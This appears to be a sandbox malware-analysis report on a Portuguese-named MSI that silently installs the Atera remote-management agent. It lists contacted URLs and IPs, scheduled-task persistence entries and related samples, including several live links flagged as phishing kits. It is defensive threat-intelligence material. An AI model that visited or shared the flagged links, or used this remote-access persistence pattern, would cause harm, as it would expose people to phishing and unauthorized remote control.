00000014.00000002.1955362018.000001BE62C63000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1CF2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D02000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1695000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D78000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F651000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F68C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://www.nuget.org/packages/NLog.Web.AspNetCoreNLog.dll.24.drfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=da8a8aee-d717-4843-aaf8-93981205c3dcAteraAgent.exe, 00000018.00000002.2940646679.0000016BD161C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://ps.pndsn.com/v2/presence/sub_key/sub-c-a02ceca8AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://agent-api.atera.com/Production/Agent/AgentStartingAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1068000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D02000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  http://www.w3.ohAteraAgent.exe, 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://agent-api.atera.com/Production/Agent/GetCommandsAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10D4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1044000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1CF2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD161C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/23.4/AgentPackageSTRemote.zip?KKgGC7fCcAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b8910c6f-67a0-4f27-ab84-5ffd997cd0c5AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=0efe0bbf-2a0e-40d8-965f-19f51f0fd321AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1068000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            http://www.disig.sk/ca0fAteraAgent.exe, 0000000D.00000002.2279102001.0000020AB9720000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              http://www.symauth.com/rpa00xdnup.dll.1.drfalse
                                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              https://agent-api.atera.com/rundll32.exe, 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1732615847.0000000004901000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1732615847.00000000049A4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.00000000045F1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.0000000004694000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                https://agent-api.atera.com/Production/Agent/GetRecurringPackagesAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA0FC1000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1068000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://ps.atera.com/agentpackageswin/Agent.Package.Availability/13.0/Agent.Package.Availability.zipAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://www.newtonsoft.com/jsonschemaAgentPackageSTRemote.exe, 00000021.00000002.2669791407.00000217326D0000.00000002.00000001.01000000.00000021.sdmpfalse
                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    http://go.microsoft.cAgentPackageAgentInformation.exe, 00000014.00000002.1954314035.000001BE6236E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://go.microsoft.ctainAgentPackageAgentInformation.exe, 00000014.00000002.1954314035.000001BE6236E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        http://nlog-project.org/ws/NLog.dll.24.drfalse
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesTNLog.dll.24.drfalse
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            https://ps.atera.com/aAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              https://ps.atera.com/agentpackagesmac/AgentPackageRuntimeInstaller/1.5/AgentPackageRuntimeInstaller.AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                https://ps.atera.com/agentpackageswin/Agent.Package.Watchdog/13.0/Agent.Package.Watchdog.zipAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=d356e0ff-7cf6-451a-abfd-493cb798864dAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                    http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA024000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                      https://github.com/dahall/taskschedulerMicrosoft.Win32.TaskScheduler.dll0.24.drfalse
                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                        https://ps.atera.com/agentpackagesnet45/Agent.Package.Availability/0.16/Agent.Package.Availability.zAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                          https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-AteraAgent.exe, 00000018.00000002.2940646679.0000016BD161C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		unknown

                                                                                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                                                            Public IPs

                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                            40.119.152.241
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                                                                                                                                                                            13.35.58.89
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                                                                                            35.157.63.228
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                                                                                            13.35.58.124
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                                                                                            192.229.221.95
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		15133EDGECASTUSfalse
                                                                                                                                                                                                                            13.35.58.7
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                                                                                            199.232.210.172
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		54113FASTLYUSfalse
                                                                                                                                                                                                                            52.223.39.232
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		8987AMAZONEXPANSIONGBfalse

                                                                                                                                                                                                                            General Information

                                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                            Analysis ID:1545758
                                                                                                                                                                                                                            Start date and time:2024-10-30 23:29:05 +01:00
                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                            Overall analysis duration:0h 13m 28s
                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                            Number of analysed new started processes analysed:70
                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                            Sample name:Arquivo_4593167.msi
                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                            Classification:mal100.troj.spyw.evad.winMSI@188/1121@0/8
                                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                                            • Successful, ratio: 28.6%
                                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                                            • Successful, ratio: 67%
                                                                                                                                                                                                                            • Number of executed functions: 381
                                                                                                                                                                                                                            • Number of non-executed functions: 1
                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                            • Found application associated with file extension: .msi

                                                                                                                                                                                                                            Warnings

                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                            • Execution Graph export aborted for target AgentPackageAgentInformation.exe, PID 2916 because it is empty
                                                                                                                                                                                                                            • Execution Graph export aborted for target AgentPackageAgentInformation.exe, PID 2932 because it is empty
                                                                                                                                                                                                                            • Execution Graph export aborted for target AgentPackageSTRemote.exe, PID 1016 because it is empty
                                                                                                                                                                                                                            • Execution Graph export aborted for target AteraAgent.exe, PID 1852 because it is empty
                                                                                                                                                                                                                            • Execution Graph export aborted for target AteraAgent.exe, PID 2640 because it is empty
                                                                                                                                                                                                                            • Execution Graph export aborted for target AteraAgent.exe, PID 6200 because it is empty
                                                                                                                                                                                                                            • Execution Graph export aborted for target rundll32.exe, PID 2084 because it is empty
                                                                                                                                                                                                                            • Execution Graph export aborted for target rundll32.exe, PID 2256 because it is empty
                                                                                                                                                                                                                            • Execution Graph export aborted for target rundll32.exe, PID 3320 because it is empty
                                                                                                                                                                                                                            • Execution Graph export aborted for target rundll32.exe, PID 5780 because it is empty
                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtSetValueKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                            • Skipping network analysis since amount of network traffic is too extensive
                                                                                                                                                                                                                            • VT rate limit hit for: Arquivo_4593167.msi

                                                                                                                                                                                                                            Simulations

                                                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                            18:30:02API Interceptor2x Sleep call for process: rundll32.exe modified
                                                                                                                                                                                                                            18:30:06API Interceptor252870x Sleep call for process: AteraAgent.exe modified
                                                                                                                                                                                                                            18:30:25API Interceptor48x Sleep call for process: AgentPackageAgentInformation.exe modified
                                                                                                                                                                                                                            18:30:32API Interceptor556x Sleep call for process: AgentPackageSTRemote.exe modified
                                                                                                                                                                                                                            18:30:54API Interceptor2x Sleep call for process: msiexec.exe modified
                                                                                                                                                                                                                            22:31:04Task SchedulerRun new task: Monitoring Recovery path: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe s>schedulerrun
                                                                                                                                                                                                                            22:31:27AutostartRun: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce {96ec02bb-b5fa-4892-a305-c6128466beda} "C:\ProgramData\Package Cache\{96ec02bb-b5fa-4892-a305-c6128466beda}\dotnet-runtime-6.0.35-win-x64.exe" /burn.runonce
                                                                                                                                                                                                                            22:31:53Task SchedulerRun new task: AteraAgentServiceWatchdog path: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.exe s>eyJBZ2VudElkIjoiYmMyZjZmZWYtN2UwNC00OTJhLWIzY2ItMWMwM2NiMGRmNWIyIiwiQ29tbWFuZElkIjoiNGViOGIzYWUtM2ExZS00YzdiLWE3ZjMtODg0ZGIyNzIxODk4IiwiQWNjb3VudElkIjoiMDAxUTMwMDAwMExsa3htSUFCIiwiQWdlbnRBcGlIb3N0IjoiYWdlbnQtYXBpLmF0ZXJhLmNvbS9Qcm9kdWN0aW9uIiwiQXJndW1lbnRzIjoie1x1MDAyMkNvbW1hbmROYW1lXHUwMDIyOlx1MDAyMmhlYWx0aGNoZWNrXHUwMDIyfSIsIkFnZW50RGlyZWN0b3J5IjoiIn0=

                                                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                                                            IPs

                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            40.119.152.241ALVARA-072.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                              setup_north_west_arctic_borrough.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                TRABALHO----PROCESSO0014S55-S440000000S1.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                  SecuriteInfo.com.Program.RemoteAdminNET.1.367.20003.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                    AdobeUpdate.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                      SecuriteInfo.com.Program.RemoteAdminNET.1.3218.16257.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                        SecuriteInfo.com.Program.RemoteAdminNET.1.22990.5900.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                          Y3Wvl9aYAU.cmdGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                            SecuriteInfo.com.Program.RemoteAdminNET.1.15125.10364.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                              SecuriteInfo.com.Program.RemoteAdminNET.1.7216.330.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                13.35.58.89ALVARA-072.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                  TRABALHO----PROCESSO0014S55-S440000000S1.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                    SecuriteInfo.com.Program.RemoteAdminNET.1.367.20003.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                      35.157.63.2289rSeCZbjZE.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                        SecuriteInfo.com.Program.RemoteAdminNET.1.3218.16257.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                          SecuriteInfo.com.Program.RemoteAdminNET.1.7216.330.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                            4PP--0001S4D8S_DANFE000S1AS4SD5555522A1111.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                              Guidelines_for_Citizen_Safety.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                forumapp.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                  SecuriteInfo.com.Program.RemoteAdminNET.1.29844.msiGet hashmaliciousGhostRatBrowse
                                                                                                                                                                                                                                                                    VirginMediaBill26012020.msiGet hashmaliciousGhostRatBrowse
                                                                                                                                                                                                                                                                      https://www.hctc.app/2ff42844-f75c-416d-b7ab-3d4167f2c303Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                        cqIMFiGPGW.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          13.35.58.124ALVARA-072.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                            https://mlbmajorlossbuilders.hbportal.co/flow/66fdd3a6c031cc001f728831/view?hash=54079a777636a614d8d961b5b9a96a5fGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              SecuriteInfo.com.Program.RemoteAdminNET.1.367.20003.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                                Y3Wvl9aYAU.cmdGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                                  https://email.mail.sgv-solutions.com/c/eJxkkzmXsjwAhX-NdvGQjSSFhQqi4zjjwqjYeAIJm2wCgvjrv2P1Fe8tbnOf8rmyqm6JmlKOhTJVAEwTakAYE0DoT_mS-2GgsBDhWE0Vlj4OxnoKGSKIMCyMcTz1AyUMgZQg0MdcMF-bTPpYBoKQkAsyTqbIQMTgCEKMTWxMMNaUaiSgpIixkI6IkcskmzRRB5oye7ZJWTSToMzH2TRu26oZ4dkILUdoGeWof6NJmHA-CVVz1x9qhJY6-IyzT-b5Sz_8rTY80G2ED75rF2eJyVZbtlkVrWmL3HCqYXa4fNkus--vFFxm6tEqKU4VqK_3dbqGx0CfqlY9u96hfZQt3aUZ0cGb_ZxzZxOZRRUXovVuiwjp6BWRTebs6-uB84FcX8PD-2Pk9qTRup-V3m6-kd1Ce7WXr8SwtKF03fU2veiUQTt_q7SMvO7ADZbxc5vlfDWzfqntP7aLrZmT2O_WjrXpZkjCR1z_KNoW_WFxVE_7_Adp0JQvAZH2hrKXnVcvnhD_pnW8P-_q70tv2WYcp0uLYLmARqOPB-Euip633lr678rdhLpvFY2P1pZnkfJOEs3tInvkv_3xlhS7gZZ7d3U4e-ksoke8aDLyppsto43sUHvZx_kNEjTfk9MzjlZz7B-gc79WsnkNV-scoPp82_F1fNk_d_v9HKROjgraKcS5p8krGiRT1iPyrvYXa1yv_EY7IB4bx0ll_M6sL3nYD_cfJ-24dYrbv1c_wtYIW-OibJMwCeTHk4--kggTchIAGGAECFMaSEYYEByz0Ag093E4rjI56PqDIxkoJCUGkGoGCOMmkJQzECKiTUmxlkqO62n6zBI9Isa_Vja6ULc2yf8_Aufjbor-CwAA__-7cQ4SGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                    https://g8mxr4.fi98.fdske.com/ec/gAAAAABmu_uYenayeXS3J3ERl2L9FOh_p3NFc4vmE4Rp9bH82FjW16jL5kwWBwaBHZuxERC9Zs0wkvKyvBf2L6jiti-KGuzj3f0BvQYe81_aqKunhM-ozdslU-az7VSOIWnkvhm8ErTYtqxWz0CZKqFEuNpWQVrZYXIpC1Pd7Ji6j_d-CA2Q1VyHL-MiEJ251b1HiviY828FznZFV22R9VvWP3_UPFcH62-o6oMCRUK9uVNwpS6Y-6yruu6mxlZ4IxWsk6SnLER-VPwigUl_XsJaDpF2VCHIbHdfSFdEE5i6DHibz6j-lZp-OFKr6QKWvelgqD5wLN2krYG5bYxJ-1WfolR_Q32a-f-6QM4K0kreU109w7s1TOZ51Bm2f7r6CnQAWOi5noJ3KejvRHIqoRDDgsaR3GlxYd9_WS54OKtGu0rBqW7fFxTUhfJ-XldTXzW3SC-zrZZbHcpjVQUrO-WtB81CZdLGDg==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                      https://f522my.fi79.fdske.com/ec/gAAAAABmpB7T0a5uPS5ojzr4t_T3OUm-FdnelJXDBC1VoV6m2V3L_fPLJYD_I4iovDAQynFwUxenvGcRNh2X00urBe5-4u-rT9GnyUh1X4xs-bp1jFgbdnQWjG990ZIV-3jiRSF6xm2yQVII0IUZNMTwe6xA7L7bXWw_begThms8P6liFgUdG6VQSYwrbqAxhU2UEyqaypup8CoqX1XTXX22SapdlozSl3U2FuKV8U9lz4_YoWYvXaj9erwugsbbIzwuyoMgDRxdh9iJQFak65dYgkq2tGXY1LV-S0k2sDgZf7wEDr63jmpMQO3SzqMfQA3mGK6zccUXpwE0i3r8hj5z4np9jw5lE8Wcp6N7QIvI_qpBMTJqfmuaZZdQ5LOQYKgqx2tl9eUzVwZBUsvbcRUHD4gPhSo47eQGLiImSy0uueaOd9GD5v-xXSggcJV4oiu3m7MRPADdbsVfsrtFilW1dPy_5ezRxo0JN8be1WWGWOeTVzt3fK4=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        https://in.xero.com/7hv8mDuF13K6MICiXjOmyJk92EdbNVBSqtgAvYsVGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                                                                          Domains

                                                                                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                                                                                          ASNs

                                                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                          AMAZON-02USfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                          • 18.244.18.38
                                                                                                                                                                                                                                                                                          Paiement.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 76.76.21.98
                                                                                                                                                                                                                                                                                          zte.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 34.249.145.219
                                                                                                                                                                                                                                                                                          https:/click.mailchimp.com/track/click/30010842/docsend.com?p=eyJzIjoiT2RaN0hwNHlyY2E3VXl5TWcwMlA2eFpHVlN3IiwidiI6MSwicCI6IntcInVcIjozMDAxMDg0MixcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2RvY3NlbmQuY29tXFxcL3ZpZXdcXFwvZzZnYzZjazdtNHlkYTRpa1wiLFwiaWRcIjpcImNhZDg3NzI1Y2UzMjRiMzI4Yzk1ZGVkYWUyMzc4ZTZjXCIsXCJ1cmxfaWRzXCI6W1wiYzE5ZWU5NGJiMzA5YmZhOGQ2MDU3OGI1Mjk5NTFmOWE4NDQ0ODNhYVwiXX0ifQ#steven.davis@tu.eduGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 18.239.36.13
                                                                                                                                                                                                                                                                                          https://share.hsforms.com/11zbkP7dfTBO0LgTS5dCN0Asixz3Get hashmaliciousMamba2FABrowse
                                                                                                                                                                                                                                                                                          • 18.245.31.89
                                                                                                                                                                                                                                                                                          https://app.pandadoc.com/document/v2?token=abf6587d58630a40e08d0ad15de8202e2e9c4af5Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 99.86.8.175
                                                                                                                                                                                                                                                                                          (No subject) (100).emlGet hashmaliciousTycoon2FABrowse
                                                                                                                                                                                                                                                                                          • 108.138.217.58
                                                                                                                                                                                                                                                                                          https://www.canva.com/design/DAGVD7_HMvQ/PFkDB3TDx6Ru4nNALhSqqQ/view?utm_content=DAGVD7_HMvQ&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 18.245.187.2
                                                                                                                                                                                                                                                                                          Reminders for Msp-partner_ Server Alert.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 54.73.203.83
                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                          • 18.244.18.32
                                                                                                                                                                                                                                                                                          MICROSOFT-CORP-MSN-AS-BLOCKUSfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                          • 20.189.173.26
                                                                                                                                                                                                                                                                                          Paiement.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 40.126.32.138
                                                                                                                                                                                                                                                                                          https://share.hsforms.com/11zbkP7dfTBO0LgTS5dCN0Asixz3Get hashmaliciousMamba2FABrowse
                                                                                                                                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                                                                                                                                          Access Audits -System #6878.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 104.47.64.28
                                                                                                                                                                                                                                                                                          https://app.pandadoc.com/document/v2?token=abf6587d58630a40e08d0ad15de8202e2e9c4af5Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 150.171.27.10
                                                                                                                                                                                                                                                                                          (No subject) (100).emlGet hashmaliciousTycoon2FABrowse
                                                                                                                                                                                                                                                                                          • 104.47.64.28
                                                                                                                                                                                                                                                                                          https://irs-ci.secureemailportal.com/s/e?m=ABDvX2xiE1DvdsTP333wt4Qp&c=ABDsD05ZNJ23bCjfjm6gXjJS&em=publicrecords%40marionfl.orgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 13.107.42.14
                                                                                                                                                                                                                                                                                          Reminders for Msp-partner_ Server Alert.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 150.171.27.10
                                                                                                                                                                                                                                                                                          819614 - Midways Freight Ltd.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 13.107.246.45
                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                          • 52.123.243.94
                                                                                                                                                                                                                                                                                          AMAZON-02USfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                          • 18.244.18.38
                                                                                                                                                                                                                                                                                          Paiement.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                          • 76.76.21.98
                                                                                                                                                                                                                                                                                          zte.elfGet hashmaliciousUnknownBrowse
